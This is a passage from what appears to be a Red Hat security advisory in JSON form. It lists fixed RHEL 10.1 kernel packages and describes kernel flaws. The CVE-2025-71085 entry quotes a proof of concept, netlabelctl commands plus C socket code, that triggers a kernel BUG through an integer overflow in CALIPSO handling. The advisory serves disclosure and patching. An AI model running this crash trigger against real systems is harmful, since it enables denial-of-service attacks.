"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: Kernel: Use-after-free in GPIO character device allows privilege escalation or denial of service"
},
{
"cve": "CVE-2025-71085",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"discovery_date": "2026-01-13T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2429026"
}
],
"notes": [
{
"category": "description",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability allows an unprivileged user to trigger a kernel BUG by causing an integer overflow in the headroom calculation used by skb_cow(), which results in a negative size passed to pskb_expand_head(). The kernel subsequently hits a reachable BUG_ON() and crashes, leading to a reliable denial-of-service condition. In worst-case scenarios, this path may be reachable via crafted IPv6 traffic with CALIPSO options.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
